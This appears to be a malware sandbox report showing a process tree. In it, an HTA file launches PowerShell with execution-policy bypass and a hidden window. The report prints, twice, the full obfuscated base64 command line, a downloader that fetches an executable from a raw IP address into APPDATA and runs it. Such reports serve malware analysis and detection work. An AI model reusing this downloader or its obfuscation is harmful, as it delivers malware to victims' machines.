| ZeroBOX

iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\89.hta.html
2624
- iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2624 CREDAT:145409
  2712
  - cmd.exe "C:\Windows\system32\cmd.exe" "/c PowErsHeLL.eXe -Ex BYpaSs -nOP -W 1 -c dEViCECreDenTiaLDEploYMenT.ExE ; IEX($(IEX('[sYSteM.TeXt.encODIng]'+[ChaR]0X3A+[cHaR]0X3A+'utf8.gETSTrinG([SySteM.coNvErt]'+[chAR]58+[CHAr]58+'FRomBASE64STRIng('+[cHaR]0x22+'JGMxOHYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSRGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9uLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRk1SdVFrbllSZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWU0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZwLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiY3JQaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXdXogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYzE4djo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjI0My4xNDcvODkvc2Fob3N0LmV4ZSIsIiRFblY6QVBQREFUQVxzYWhvc3QuZXhlIiwwLDApO3N0YXJ0LVNsRWVQKDMpO1NUQXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2Fob3N0LmV4ZSI='+[cHaR]34+'))')))"
    2944
    - powershell.exe PowErsHeLL.eXe -Ex BYpaSs -nOP -W 1 -c dEViCECreDenTiaLDEploYMenT.ExE ; IEX($(IEX('[sYSteM.TeXt.encODIng]'+[ChaR]0X3A+[cHaR]0X3A+'utf8.gETSTrinG([SySteM.coNvErt]'+[chAR]58+[CHAr]58+'FRomBASE64STRIng('+[cHaR]0x22+'JGMxOHYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSRGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9uLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRk1SdVFrbllSZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWU0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZwLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiY3JQaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXdXogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYzE4djo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjI0My4xNDcvODkvc2Fob3N0LmV4ZSIsIiRFblY6QVBQREFUQVxzYWhvc3QuZXhlIiwwLDApO3N0YXJ0LVNsRWVQKDMpO1NUQXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2Fob3N0LmV4ZSI='+[cHaR]34+'))')))"
      3004
      - csc.exe "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\r3xzal4t.cmdline"
        2724
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RESC4F2.tmp" "c:\Users\test22\AppData\Local\Temp\CSCC483.tmp"
        544

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents